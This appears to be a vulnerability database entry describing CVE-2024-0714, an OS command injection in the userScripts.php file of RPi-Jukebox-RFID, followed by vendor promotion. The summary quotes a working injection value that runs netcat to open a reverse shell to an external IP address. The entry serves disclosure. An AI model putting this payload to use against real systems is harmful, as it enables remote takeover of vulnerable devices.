CVE-2024-0714

CVSS 3.1 Score 9.8 of 10 (high)

Details

Published Jan 19, 2024
Updated: May 17, 2024
CWE ID 78

Summary

CVE-2024-0714 is a critical vulnerability affecting MiczFlor RPi-Jukebox-RFID up to version 2.5.0. The issue lies within the file userScripts.php in the HTTP Request Handler component, which is susceptible to os command injection. By manipulating the argument folder with the input ";nc 104.236.1.147 4444 -e /bin/bash;", an attacker can execute arbitrary operating system commands remotely. The vulnerability has been publicly disclosed, and the exploit is available. No response has been received from the vendor regarding this issue. (VDB-251540)

Ligh bulbPrevent cyber attacks with Recorded Future by prioritizing and patching critical vulnerabilities being exploited by threat actors targeting your industry. Book your demo to learn more.

Share

Prioritize, Pinpoint, and Act to Prevent Vulnerability Exploits with Recorded Future

Note: This is just a basic overview providing quick insights into CVE-2024-0714 information. Gain full access to comprehensive CVE data, third party vulnerabilities, compromised credentials and more with Recorded Future
  • Gain complete coverage of your cyber, third party, and physical attack surface
  • Proactively mitigate threats before they turn into costly attacks
  • Make fast, effective, data-driven decisions